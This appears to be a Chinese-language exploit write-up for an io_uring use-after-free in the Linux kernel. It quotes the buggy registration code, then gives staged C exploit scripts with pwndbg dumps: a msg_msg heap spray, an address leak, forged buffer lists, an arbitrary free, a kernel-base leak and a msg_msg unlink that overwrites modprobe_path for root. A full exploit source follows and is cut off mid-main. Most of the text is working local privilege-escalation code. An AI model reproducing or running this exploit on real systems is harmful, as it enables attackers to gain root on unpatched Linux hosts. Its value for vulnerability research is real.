 * Returns 0 on success; -EFAULT, -EINVAL, -EEXIST, -ENOMEM, the error
 * from io_init_bl_list(), or the error encoded in the io_pin_pages()
 * result on failure.
 */
static int io_register_pbuf_ring(struct io_ring_ctx *ctx, void __user *arg)
{
struct io_uring_buf_ring *br;
struct io_uring_buf_reg reg;
struct io_buffer_list *bl;
struct page **pages;
int nr_pages;

if (copy_from_user(&reg, arg, sizeof(reg)))
return -EFAULT;

/* Reserved fields must be zero; the ring address must be non-NULL and page aligned. */
if (reg.pad || reg.resv[0] || reg.resv[1] || reg.resv[2])
return -EINVAL;
if (!reg.ring_addr)
return -EFAULT;
if (reg.ring_addr & ~PAGE_MASK)
return -EINVAL;
if (!is_power_of_2(reg.ring_entries))
return -EINVAL;

if (unlikely(reg.bgid < BGID_ARRAY && !ctx->io_bl)) { /* allocate the io_buffer_list array for this io_uring context */
int ret = io_init_bl_list(ctx); /* per the article, this allocates ctx->io_bl[64] */
if (ret)
return ret;
}

bl = io_buffer_get_list(ctx, reg.bgid); /* look up the buffer list for the given buffer group id */
if (bl) {
/* if mapped buffer ring OR classic exists, don't allow */
if (bl->buf_nr_pages || !list_empty(&bl->buf_list))
return -EEXIST;
} else {
bl = kzalloc(sizeof(*bl), GFP_KERNEL);
if (!bl)
return -ENOMEM;
}

pages = io_pin_pages(reg.ring_addr,
struct_size(br, bufs, reg.ring_entries),
&nr_pages); /* pin the user pages backing the ring (FOLL_PIN, per the article) */
if (IS_ERR(pages)) {
/*
* NOTE: bl is freed unconditionally here, even when it was returned
* by io_buffer_get_list() above rather than allocated by kzalloc().
* This is the bug the article analyses.
*/
kfree(bl);
return PTR_ERR(pages);
}

br = page_address(pages[0]); /* kernel address of the buffer ring */
bl->buf_pages = pages;
bl->buf_nr_pages = nr_pages;
bl->nr_entries = reg.ring_entries;
bl->buf_ring = br;
bl->mask = reg.ring_entries - 1; /* ring_entries is a power of two, so this works as an index mask */
io_buffer_add_list(ctx, bl, reg.bgid); /* per the article: sets bl->bgid = reg.bgid and inserts bl into the ctx XArray */
return 0;
}
  • 首先检查传入的参数,并在 io_uring_context 中分配 io_buffer_list 对象数组 ctx->io_bl
  • 然后根据参数中的缓冲区组ID找到对应的 io_buffer_list 对象
  • 然后调用 io_pin_pages 尝试根据用户给定的地址和长度分配 FOLL_PIN 的页
  • 如果分配失败,就直接释放掉 io_buffer_list 对象(变量 bl 指向的是对象数组中的一项,不能单独释放,因而触发报错)

变量 bl=&ctx->io_bl[bgid],如果 bgid=0,就可以释放整个 ctx->io_bl(不会触发报错),但是释放之后并没有清除 ctx->io_bl,后续使用就会造成 UAF

  • PS:从后续修复的代码来看,设计者可能只是想释放由 kzalloc(sizeof(*bl), GFP_KERNEL) 申请的内存,但是没有考虑周全

入侵思路

有 UAF 的对象大小为 0x800(使用 kmalloc-2k),可以尝试利用 msg_msg 占用 UAF 堆块,然后利用 io_provide_buffers() 在链表 ctx->io_bl[0].buf_list 上添加一个 io_buffer 对象

测试脚本如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
   init_io_uring();

/* Create the message queues used later to spray/reclaim kernel chunks. */
for (int i = 0; i < MSG_QUEUE_NUM; i++){
if ((msgid[i] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT)) < 0)
err_exit("failed to create msg_queue!");
}

/* Trigger the bug: ctx->io_bl is freed while the context keeps pointing at it. */
do_free_first();

puts("try to get UAF object");

/* Reclaim the freed chunk with a msg_msg; the article reports it covers 0x420 bytes. */
struct msgbuf* msg = (struct msgbuf*)buffer;
int msg_len = 0x420 - 0x30;
msg->mtype = 0x0001;
memset(msg->mtext, '\x00', msg_len);
msgsnd(msgid[0], msg, msg_len, 0);

/* Link an io_buffer into ctx->io_bl[0] so that it is later mistaken for a msg_msg object */
void* pbuf = do_mmap(PBUF_BASE, PAGE_SIZE);
sqes->opcode = IORING_OP_PROVIDE_BUFFERS;
sqes->rw_flags = 0;
sqes->splice_fd_in = 0;
sqes->fd = 1;
sqes->addr = pbuf; // io_buffer->addr overlaps msg_msg->m_type
sqes->len = 0xFD0; // io_buffer->len overlaps msg_msg->m_ts
sqes->buf_group = 0; // link into ctx->io_bl[buf_group]; group 0 overlaps the msg_msg header, which lets us fake a msg_msg
submit_provide_buffer();

/* Take two objects from ctx->io_buffer_cache to obtain pointers to ctx->io_bl[33], which reveals the kmalloc-2k chunk address */
for (int i = 0; i < 0x2; i++) {
sqes->addr = malloc(0x100);
sqes->len = 0x100;
sqes->buf_group = 0x21; /* everything past 0x420 is still an intact io_buffer_list (not overwritten by the msg_msg), so link at offset 0x420 (0x420/0x20 = 0x21) */
submit_provide_buffer();
}

puts("submit_provide_buffer");

/* Sentinel inside the receive buffer: it changes once the worker's msgrcv() has copied data out. */
uint64_t* tag = (uint64_t*)(buffer + 0xF00);
*tag = 0xdeadbeef;
pthread_t th;
pthread_create(&th, NULL, worker, buffer);

/* Spin until the sentinel has been overwritten. */
while (*tag == 0xdeadbeef) ;

正常状态下的 io_buffer_list

1
2
3
4
5
6
7
8
9
pwndbg> telescope 0xffff8880059f6800
00:0000│ rdi rbp 0xffff8880059f6800 ◂— 0xffff8880059f6800
01:00080xffff8880059f6808 —▸ 0xffff8880059f6800 ◂— 0xffff8880059f6800
02:00100xffff8880059f6810 ◂— 0x0
03:00180xffff8880059f6818 ◂— 0x0
04:00200xffff8880059f6820 ◂— 0xffff8880059f6820
05:00280xffff8880059f6828 —▸ 0xffff8880059f6820 ◂— 0xffff8880059f6820
06:00300xffff8880059f6830 ◂— 0x1
07:00380xffff8880059f6838 ◂— 0x0

msg_msg 覆盖后:

1
2
3
4
5
6
7
8
9
pwndbg> telescope 0xffff8880059f6800
00:00000xffff8880059f6800 —▸ 0xffff8880059d56c0 ◂— 0xffff8880059f6800
01:00080xffff8880059f6808 —▸ 0xffff8880059d56c0 —▸ 0xffff8880059f6800 ◂— 0xffff8880059d56c0
02:00100xffff8880059f6810 ◂— 0x1
03:00180xffff8880059f6818 ◂— 0x3f0
04:00200xffff8880059f6820 ◂— 0x0
05:00280xffff8880059f6828 —▸ 0xffff8880051ab548 ◂— 0x1
06:00300xffff8880059f6830 ◂— 0x0
07:00380xffff8880059f6838 ◂— 0x0
  • msg_msg 覆盖大小为 0x420,后续的 io_buffer_list 正常
1
2
3
4
5
6
7
pwndbg> telescope 0xffff8880059f6800+0x420
00:00000xffff8880059f6c20 —▸ 0xffff888005a16020 —▸ 0xffff888005a16040 ◂— 0xffff8880059f6c20
01:00080xffff8880059f6c28 —▸ 0xffff888005a16040 —▸ 0xffff8880059f6c20 —▸ 0xffff888005a16020 ◂— 0x0
02:00100xffff8880059f6c30 ◂— 0x21 /* '!' */
03:00180xffff8880059f6c38 ◂— 0x0
04:00200xffff8880059f6c40 ◂— 0xffff8880059f6c40
05:00280xffff8880059f6c48 —▸ 0xffff8880059f6c40 ◂— 0xffff8880059f6c40

添加 io_buffer 对象后:

1
2
3
4
5
6
7
8
9
pwndbg> telescope 0xffff8880059f6800
00:00000xffff8880059f6800 —▸ 0xffff8880059d56c0 —▸ 0xffff888005a16000 ◂— 0xffff8880059f6800
01:00080xffff8880059f6808 —▸ 0xffff888005a16000 —▸ 0xffff8880059f6800 —▸ 0xffff8880059d56c0 ◂— 0x0
02:00100xffff8880059f6810 ◂— 0x1
03:00180xffff8880059f6818 ◂— 0x3f0
04:00200xffff8880059f6820 ◂— 0x0
05:00280xffff8880059f6828 —▸ 0xffff8880051ab548 ◂— 0x1
06:00300xffff8880059f6830 ◂— 0x0
07:00380xffff8880059f6838 ◂— 0x0
  • 对于 msg_msg 而言,程序会误以为 io_buffer 对象也是 msg_msg 结构体
  • 打印位于 ctx->io_buffer_cache 中的 io_buffer 对象:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
pwndbg> telescope 0xffff888005a16000
/* 第1个io_buffer对象 */
00:00000xffff888005a16000 —▸ 0xffff8880059f6800 —▸ 0xffff8880059d56c0 ◂— 0xffff888005a16000
01:00080xffff888005a16008 —▸ 0xffff8880059d56c0 —▸ 0xffff888005a16000 —▸ 0xffff8880059f6800 ◂— 0x0
02:00100xffff888005a16010 —▸ 0x1000 (cpu_debug_store) ◂— 0x0
03:00180xffff888005a16018 ◂— 0xfd0
/* 第2个io_buffer对象 */
04:00200xffff888005a16020 —▸ 0xffff888005a16040 —▸ 0xffff8880059f6c20 ◂— 0xffff888005a16020
05:00280xffff888005a16028 —▸ 0xffff8880059f6c20 —▸ 0xffff888005a16020 —▸ 0xffff888005a16040 ◂— 0x0
06:00300xffff888005a16030 —▸ 0x1bd2b80 ◂— 0x0
07:00380xffff888005a16038 ◂— 0x21000000000100
/* 第3个io_buffer对象 */
08:00400xffff888005a16040 —▸ 0xffff8880059f6c20 —▸ 0xffff888005a16020 ◂— 0xffff888005a16040
09:00480xffff888005a16048 —▸ 0xffff888005a16020 —▸ 0xffff888005a16040 —▸ 0xffff8880059f6c20 ◂— 0x0
0a:00500xffff888005a16050 —▸ 0x1bd2c90 ◂— 0x0
0b:00580xffff888005a16058 ◂— 0x21000000000100
  • 新添加的第2,3个 io_buffer 对象都会链接到 ctx->io_bl[33] 构成循环链表,利用这一点可以泄露 ctx->io_bl 的地址(UAF 对象的地址)

接下来我想尝试正常释放 ctx->io_bl 并用其他内核结构体占位,但不管是 io_unregister_pbuf_ring 还是 io_destroy_buffers 都会因为 io_buffer_list 的结构被破坏而执行失败

这里文章采用的利用思路是:

  • 利用 msg_msg 伪造 io_buffer_list 对象
  • 然后通过 kvfree(bl->buf_pages) 获取 kmalloc-2k 上的任意地址 free
  • 构造对象重叠以备后续利用

测试脚本如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
    msg_len = 0x800 - 0x30;
memset(msg->mtext, 0x00, msg_len);
msgsnd(msgid[2], msg, msg_len, 0); /* create the "new" msg_msg */

int spray_uring_fd;
struct io_uring_params p;
memset(&p, 0, sizeof(p));
spray_uring_fd = io_uring_setup(0x1, &p); /* create another io_ring_ctx */
/* Note: SLUB randomization is off, so the UAF msg_msg, the new msg_msg and the io_ring_ctx end up adjacent */

ret = msgrcv(msgid[0], buffer, PAGE_SIZE, (long)0x0001, 0); /* free the UAF msg_msg */

/* Convert an offset inside the chunk into an index into mtext (0x30 is subtracted for the part preceding mtext). */
#define IDX(x) (((x)-0x30) / 8)

uint64_t* tmp = (uint64_t*)msg->mtext; // forge io_buffer_list entries
tmp[IDX(0x40)] = io_bl + 0x60; // fake_bl.buf_pages
tmp[IDX(0x48)] = io_bl; // fake_bl.buf_ring (must point at readable memory)
tmp[IDX(0x50)] = 0x10000; // fake_bl.buf_nr_pages = 1
tmp[IDX(0x60)] = io_bl + 0x68; // treated as buf_pages[0]
tmp[IDX(0x68)] = 0xdeadbeef; // treated as the page object

tmp[IDX(0x80)] = io_bl + 0xa0; // fake_bl.buf_pages
tmp[IDX(0x88)] = io_bl; // fake_bl.buf_ring (must point at readable memory)
tmp[IDX(0x90)] = 0x10000; // fake_bl.buf_nr_pages = 1
tmp[IDX(0xa0)] = io_bl + 0x1000; // treated as buf_pages[0]

msg_len = 0x800 - 0x30;
ret = msgsnd(msgid[1], msg, msg_len, 0); /* re-allocate the UAF msg_msg with the forged content */

struct io_uring_buf_reg reg;
memset(&reg, 0, sizeof(reg));
reg.bgid = 0x2;
ret = io_uring_register(uring_fd, IORING_UNREGISTER_PBUF_RING, &reg, 1); /* __io_remove_buffers() performs kvfree() on the address we chose */

打印 UAF 对象:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
pwndbg> telescope 0xffff888005a33800
00:00000xffff888005a33800 —▸ 0xffff8880059e54c0 ◂— 0xffff888005a33800
01:00080xffff888005a33808 —▸ 0xffff8880059e54c0 —▸ 0xffff888005a33800 ◂— 0xffff8880059e54c0
02:00100xffff888005a33810 ◂— 0x1
03:00180xffff888005a33818 ◂— 0x7d0
04:00200xffff888005a33820 ◂— 0x0
05:00280xffff888005a33828 —▸ 0xffff88800586a288 ◂— 0x1
06:00300xffff888005a33830 ◂— 0x0
07:00380xffff888005a33838 ◂— 0x0
08:00400xffff888005a33840 —▸ 0xffff888005a33860 —▸ 0xffff888005a33868 ◂— 0xdeadbeef
09:00480xffff888005a33848 —▸ 0xffff888005a33800 —▸ 0xffff8880059e54c0 ◂— 0xffff888005a33800
0a:00500xffff888005a33850 ◂— 0x10000
0b:00580xffff888005a33858 ◂— 0x0
0c:00600xffff888005a33860 —▸ 0xffff888005a33868 ◂— 0xdeadbeef
0d:00680xffff888005a33868 ◂— 0xdeadbeef
0e:00700xffff888005a33870 ◂— 0x0
0f:00780xffff888005a33878 ◂— 0x0
10:00800xffff888005a33880 —▸ 0xffff888005a338a0 —▸ 0xffff888005a34800 ◂— 0x607fe0c00e60
11:00880xffff888005a33888 —▸ 0xffff888005a33800 —▸ 0xffff8880059e54c0 ◂— 0xffff888005a33800
12:00900xffff888005a33890 ◂— 0x10000
13:00980xffff888005a33898 ◂— 0x0
14:00a0│ 0xffff888005a338a0 —▸ 0xffff888005a34800 ◂— 0x607fe0c00e60
  • 此时已经成功伪造了 io_buffer_list
1
2
3
4
5
0xffffffff8132fb6f <__io_uring_register+623>    call   __io_remove_buffers.isra.0           >
rdi: 0xffff888005a33840 —▸ 0xffff888005a33860 —▸ 0xffff888005a33868 ◂— 0xdeadbeef
rsi: 0xffffffff
rdx: 0xffff888005804880 ◂— 0x8
rcx: 0xffffffff8132fb64 (__io_uring_register+612) ◂— mov esi, 0xffffffff
1
2
3
4
5
0xffffffff81325ebe <__io_remove_buffers.isra.0+270>    call   kvfree            <kvfree>
rdi: 0xffff888005a33860 —▸ 0xffff888005a33868 ◂— 0xdeadbeef
rsi: 0x0
rdx: 0xffff888005804880 ◂— 0x8
rcx: 0xffffffff81325eb8 (__io_remove_buffers.isra.0+264) ◂— mov rdi, qword ptr [rbx]
  • 这里将会释放 io_buffer_list 内部的内存区域,实现堆重叠

利用堆重叠可以覆盖位于 UAF msg_msg 下方的另一个 msg_msg,然后溢出读取这个 msg_msg 下方的 io_ring_ctx 对象:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
tmp = (uint64_t*)msg->mtext; /* this allocation lands at msg_msg+0x60 and overlaps the new msg_msg */
tmp[IDX(0x420 - 0x60)] = io_bl + 0x420; // self-referencing pointer: keeps the worker stuck, otherwise the kernel crashes

/* Offsets 0x800/0x808 are the two words of m_list; struct list_head stores next first, then prev. */
tmp[IDX(0x800 - 0x60)] = io_bl + 0x830; // fake_msg.m_list.next
tmp[IDX(0x808 - 0x60)] = io_bl + 0x830; // fake_msg.m_list.prev
tmp[IDX(0x810 - 0x60)] = 0x00001; // fake_msg.m_type
tmp[IDX(0x818 - 0x60)] = 0xFD0; // fake_msg.m_ts
tmp[IDX(0x820 - 0x60)] = 0; // fake_msg.next
tmp[IDX(0x828 - 0x60)] = io_bl + 0x840; // fake_msg.security (must point at readable memory)
tmp[IDX(0x830 - 0x60)] = io_bl + 0x800; // fake circular list node
tmp[IDX(0x838 - 0x60)] = io_bl + 0x800;
tmp[IDX(0x840 - 0x60)] = 0xdeadbeef;

msg_len = 0x800 - 0x30;
ret = msgsnd(msgid[3], msg, msg_len, 0);

/* The enlarged m_ts makes this receive read past the message into the following io_ring_ctx. */
msgrcv(msgid[2], buffer, PAGE_SIZE, (long)0x0001, 0);
uint64_t* io_ring_ctx = (uint64_t*)(buffer + 0x8 + 0x800 - 0x30);
print_hex(io_ring_ctx, 0x200);

计算出内核基地址后,就可以考虑打 msg_msg unlink attack,往 modprobe_path 中写入自定义脚本的路径

测试脚本如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
msg_len = 0x800 - 0x30;
memset(msg->mtext, 'a', msg_len);
msgsnd(msgid[4], msg, msg_len, 0);

ret = msgrcv(msgid[3], buffer, msg_len, /* msg_type= */ (long)0x0001, 0);

tmp = (uint64_t*)msg->mtext;
tmp[IDX(0x420 - 0x60)] = io_bl + 0x420; // self-referencing pointer: keeps the worker stuck, otherwise the kernel crashes

/* Offsets 0x800/0x808 are the two words of m_list; struct list_head stores next first, then prev. */
tmp[IDX(0x800 - 0x60)] = modprobe_path - 0x8; // fake_msg.m_list.next
tmp[IDX(0x808 - 0x60)] = 0x612f706d742f; // fake_msg.m_list.prev, the bytes of "/tmp/a"
tmp[IDX(0x810 - 0x60)] = 0x00001; // fake_msg.m_type
tmp[IDX(0x818 - 0x60)] = 0xFD0; // fake_msg.m_ts
tmp[IDX(0x820 - 0x60)] = 0; // fake_msg.next
tmp[IDX(0x828 - 0x60)] = io_bl + 0x840; // fake_msg.security (must point at readable memory)

msg_len = 0x800 - 0x30;
msgsnd(msgid[5], msg, msg_len, 0);
puts("try to msg unlink attack");
sleep(2);

/* Receive in a child process: unlinking the forged message performs the write. */
if (fork() == 0) {
msgrcv(msgid[4], buffer, PAGE_SIZE, /* msg_type= */ (long)0x0001, 0);
}

用同样的方法控制 msg_msg,不过这次的目的是修改 msg_msg.m_list

1
2
3
4
5
6
7
8
100:08000xffff888005bfd800 —▸ 0xffffffff82e51258 ◂— 0x0
101:08080xffff888005bfd808 ◂— 0x612f706d742f /* '/tmp/a' */
102:08100xffff888005bfd810 ◂— 0x1
103:08180xffff888005bfd818 ◂— 0xfd0
104:08200xffff888005bfd820 —▸ 0xffff888005bfd420 ◂— 0xffff888005bfd420
105:08280xffff888005bfd828 —▸ 0xffff888005bfd840 ◂— 0x6161616161616161 ('aaaaaaaa')
106:08300xffff888005bfd830 ◂— 0x6161616161616161 ('aaaaaaaa')
107:08380xffff888005bfd838 ◂— 0x6161616161616161 ('aaaaaaaa')

最后触发 msg_msg unlink attack 即可完成提权

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sched.h>
#include <string.h>
#include <sys/prctl.h>
#include <linux/io_uring.h>
#include <stdatomic.h>

#include "kernelpwn.h"

#define MSG_QUEUE_NUM 0x10

#define PAGE_SIZE 0x1000
#define BUFFER_LEN (PAGE_SIZE * 8)
#define PBUF_BASE ((void*)0x1000)

#define IORING_REGISTER_PBUF_RING (22)
#define IORING_UNREGISTER_PBUF_RING (23)

#define IORING_OP_PROVIDE_BUFFERS (31)

//内存屏障宏
#define io_uring_smp_store_release(p, v) \
atomic_store_explicit((_Atomic typeof(*(p))*)(p), (v), \
memory_order_release)

#define io_uring_smp_load_acquire(p) \
atomic_load_explicit((_Atomic typeof(*(p))*)(p), \
memory_order_acquire)

/*
 * Argument passed to io_uring_register() with the PBUF_RING register and
 * unregister opcodes in this file. The kernel code quoted in the article
 * rejects a zero or non-page-aligned ring_addr and a ring_entries value that
 * is not a power of two. Declared locally, presumably because the build
 * host's <linux/io_uring.h> does not provide it -- TODO confirm.
 */
struct io_uring_buf_reg {
__u64 ring_addr; /* user address of the buffer ring */
__u32 ring_entries; /* number of ring entries */
__u16 bgid; /* buffer group id */
__u16 pad;
__u64 resv[3];
};

/*
 * Local copy of the submission queue entry layout, used instead of the
 * system header's definition to size and fill the mmap'ed SQE array.
 * Presumably named new_* to avoid clashing with struct io_uring_sqe from
 * <linux/io_uring.h> -- TODO confirm. The exploit only sets opcode, fd, addr,
 * len, rw_flags, buf_group and splice_fd_in.
 */
struct new_io_uring_sqe {
__u8 opcode; /* type of operation for this sqe */
__u8 flags; /* IOSQE_ flags */
__u16 ioprio; /* ioprio for the request */
__s32 fd; /* file descriptor to do IO on */
union {
__u64 off; /* offset into file */
__u64 addr2;
};
union {
__u64 addr; /* pointer to buffer or iovecs */
__u64 splice_off_in;
};
__u32 len; /* buffer size or number of iovecs */
union {
__kernel_rwf_t rw_flags;
__u32 fsync_flags;
__u16 poll_events; /* compatibility */
__u32 poll32_events; /* word-reversed for BE */
__u32 sync_range_flags;
__u32 msg_flags;
__u32 timeout_flags;
__u32 accept_flags;
__u32 cancel_flags;
__u32 open_flags;
__u32 statx_flags;
__u32 fadvise_advice;
__u32 splice_flags;
__u32 rename_flags;
__u32 unlink_flags;
__u32 hardlink_flags;
};
__u64 user_data; /* data to be passed back at completion time */
/* pack this to avoid bogus arm OABI complaints */
union {
/* index into fixed buffers, if used */
__u16 buf_index;
/* for grouped buffer selection */
__u16 buf_group;
} __attribute__((packed));
/* personality to use, if used */
__u16 personality;
union {
__s32 splice_fd_in;
__u32 file_index;
};
__u64 __pad2[2];
};

int uring_fd;
char* buffer;
struct new_io_uring_sqe* sqes;
unsigned *sring_tail, *sring_mask, *sring_array, *cring_head;
int msgid[MSG_QUEUE_NUM];

/*
 * Thread entry point: blocks in msgrcv() on msgid[0], asking for a message
 * whose type equals PBUF_BASE and copying up to PAGE_SIZE bytes into `res`.
 *
 * The caller expects this thread to stay stuck inside the kernel; the puts()
 * only runs if msgrcv() unexpectedly returns.
 *
 * Returns NULL. The explicit return is required because the function is
 * declared to return void* and is used as a pthread start routine.
 */
void* worker(void* res)
{
    msgrcv(msgid[0], res, PAGE_SIZE, (long)PBUF_BASE, 0);
    puts("shouldn't get here");
    return NULL;
}

/*
 * Map `len` bytes of private anonymous read/write memory and zero it.
 *
 * base: desired address, or NULL to let the kernel choose. A non-NULL base
 *       is requested with MAP_FIXED.
 * Returns the mapping. On failure, or if the mapping did not land on a
 * requested base, reports through err_exit("mmap") and exits with -1.
 */
void* do_mmap(void* base, size_t len)
{
    const int map_flags = MAP_ANONYMOUS | MAP_PRIVATE | (base ? MAP_FIXED : 0);
    void* mapping = mmap(base, len, PROT_READ | PROT_WRITE, map_flags, -1, 0);

    if (mapping == MAP_FAILED || (base != NULL && mapping != base)) {
        err_exit("mmap");
        exit(-1);
    }

    memset(mapping, '\x00', len);
    return mapping;
}

/*
 * Raw wrapper around the io_uring_setup system call.
 * Returns the syscall result truncated to int.
 */
int io_uring_setup(unsigned entries, struct io_uring_params* p)
{
    long rc = syscall(__NR_io_uring_setup, entries, p);

    return (int)rc;
}

/*
 * Raw wrapper around the io_uring_register system call.
 * Returns the syscall result truncated to int.
 */
int io_uring_register(unsigned int fd, unsigned int opcode,
                      void* arg, unsigned int nr_args)
{
    long rc = syscall(__NR_io_uring_register, fd, opcode, arg, nr_args);

    return (int)rc;
}

/*
 * Raw wrapper around the io_uring_enter system call; the trailing signal-mask
 * arguments are always passed as NULL and 0.
 * Returns the syscall result truncated to int.
 */
int io_uring_enter(int ring_fd, unsigned int to_submit, unsigned int min_complete, unsigned int flags)
{
    long rc = syscall(__NR_io_uring_enter, ring_fd, to_submit, min_complete, flags, NULL, 0);

    return (int)rc;
}

/*
 * Submit the SQE currently staged in sqes[0] and consume one completion.
 *
 * Publishes index 0 in the SQ array, advances the SQ tail by one, calls
 * io_uring_enter() to submit one entry and wait for one completion, then
 * advances the CQ head by one. The io_uring_enter() result is ignored.
 */
void submit_provide_buffer(void)
{
    /* Slot 0 of the SQ index array always refers to sqes[0]. */
    io_uring_smp_store_release(&sring_array[0], 0);

    unsigned next_tail = *sring_tail + 1;
    io_uring_smp_store_release(sring_tail, next_tail);

    (void)io_uring_enter(uring_fd, 1, 1, IORING_ENTER_GETEVENTS);

    unsigned next_head = io_uring_smp_load_acquire(cring_head) + 1;
    io_uring_smp_store_release(cring_head, next_head);
}

/*
 * Create the main io_uring instance (uring_fd) with one SQ entry, map its SQ
 * ring, SQE array and CQ ring, and allocate the shared scratch `buffer`.
 *
 * Sets the globals uring_fd, sring_tail, sring_mask, sring_array, sqes,
 * cring_head and buffer. The original author tagged this function with
 * "kmalloc-2k"; the article states that the freed io_bl array is a
 * kmalloc-2k object.
 *
 * A failed io_uring_setup() or mmap() is reported through err_exit() and
 * terminates the process, mirroring do_mmap(), instead of continuing with an
 * invalid descriptor or MAP_FAILED pointers.
 */
void init_io_uring(void)
{
    struct io_uring_params p = {0};

    uring_fd = io_uring_setup(0x1, &p);
    if (uring_fd < 0) {
        err_exit("io_uring_setup");
        exit(-1);
    }

    /* Ring sizes are derived from the offsets the kernel filled into p. */
    size_t sring_sz = p.sq_off.array + p.sq_entries * sizeof(unsigned);
    size_t cring_sz = p.cq_off.cqes + p.cq_entries * sizeof(struct io_uring_cqe);
    size_t sqes_sz = p.sq_entries * sizeof(struct new_io_uring_sqe);

    unsigned char* sq_ptr = mmap(NULL, sring_sz, PROT_READ | PROT_WRITE, MAP_SHARED, uring_fd, IORING_OFF_SQ_RING);
    if (sq_ptr == MAP_FAILED) {
        err_exit("mmap sq ring");
        exit(-1);
    }

    sring_tail = (unsigned int*)(sq_ptr + p.sq_off.tail);
    sring_mask = (unsigned int*)(sq_ptr + p.sq_off.ring_mask);
    sring_array = (unsigned int*)(sq_ptr + p.sq_off.array);

    /* Submission queue entries. */
    sqes = mmap(NULL, sqes_sz, PROT_READ | PROT_WRITE, MAP_SHARED, uring_fd, IORING_OFF_SQES);
    if (sqes == MAP_FAILED) {
        err_exit("mmap sqes");
        exit(-1);
    }

    unsigned char* cq_ptr = mmap(NULL, cring_sz, PROT_READ | PROT_WRITE, MAP_SHARED, uring_fd, IORING_OFF_CQ_RING);
    if (cq_ptr == MAP_FAILED) {
        err_exit("mmap cq ring");
        exit(-1);
    }

    cring_head = (unsigned int*)(cq_ptr + p.cq_off.head);

    buffer = do_mmap(0, BUFFER_LEN);
    if (buffer == NULL) {
        err_exit("malloc buffer");
    }
}

int do_free_first(void)
{
int ret;

struct io_uring_buf_reg reg;
memset(&reg, 0, sizeof(reg));
reg.ring_addr = 0xF00000000;
reg.ring_entries = 0x20000000;
reg.bgid = 0x0;

ret = io_uring_register(uring_fd, IORING_REGISTER_PBUF_RING, &reg, 1);
return ret;
}

/*
* skb_shared_info need to take 320 bytes at the tail
* so the max size of buf we should send is:
* 2048 - 320*2 = 1408
*/
char fake_secondary_msg[1408];

/*
 * Exploit driver for the io_uring buffer-list use-after-free described in the
 * article.
 *
 * Stages (the order of allocations and frees is the exploit itself, so the
 * statements must not be reordered):
 *   1. Free ctx->io_bl through a failing PBUF_RING registration and reclaim
 *      the chunk with a msg_msg.
 *   2. Link io_buffer objects into the stale lists so that msgrcv() in a
 *      helper thread leaks the chunk address (io_bl).
 *   3. Forge io_buffer_list entries inside a msg_msg and unregister group 2,
 *      which frees an address inside the chunk and creates overlapping objects.
 *   4. Use the overlap to forge a msg_msg header, over-read the neighbouring
 *      io_ring_ctx and derive the kernel offset.
 *   5. Forge the header again so that unlinking the message writes "/tmp/a"
 *      over modprobe_path, then execute a file with an unknown format.
 *
 * Does not return in practice: the process spins at the end, presumably so
 * that the corrupted kernel objects are never torn down.
 */
int main(int argc, char **argv, char **envp)
{
    int ret;

    save_status();
    unshare_setup();

    init_io_uring();

    for (int i = 0; i < MSG_QUEUE_NUM; i++) {
        if ((msgid[i] = msgget((key_t)1234 + i, 0666 | IPC_CREAT | IPC_EXCL)) < 0)
            err_exit("failed to create msg_queue!");
    }

    /* Stage 1: free ctx->io_bl, then reclaim it with a msg_msg. */
    do_free_first();

    puts("try to get UAF object");

    struct msgbuf* msg = (struct msgbuf*)buffer;
    int msg_len = 0x420 - 0x30;
    msg->mtype = 0x0001;
    memset(msg->mtext, '\x00', msg_len);
    msgsnd(msgid[0], msg, msg_len, 0);

    /*
     * Stage 2: link an io_buffer into group 0. Its addr/len fields overlap
     * msg_msg->m_type/m_ts, so the queue later treats it as a message of
     * type PBUF_BASE and size 0xFD0.
     */
    void* pbuf = do_mmap(PBUF_BASE, PAGE_SIZE);
    sqes->opcode = IORING_OP_PROVIDE_BUFFERS;
    sqes->rw_flags = 0;
    sqes->splice_fd_in = 0;
    sqes->fd = 1;
    sqes->addr = (uint64_t)pbuf;
    sqes->len = 0xFD0;
    sqes->buf_group = 0;
    submit_provide_buffer();

    /*
     * Two more io_buffers in group 0x21 (offset 0x420, just past the msg_msg)
     * form a circular list through ctx->io_bl[0x21], which exposes the chunk
     * address to the over-read below.
     */
    for (int i = 0; i < 0x2; i++) {
        sqes->addr = (uint64_t)malloc(0x100);
        sqes->len = 0x100;
        sqes->buf_group = 0x21;
        submit_provide_buffer();
    }

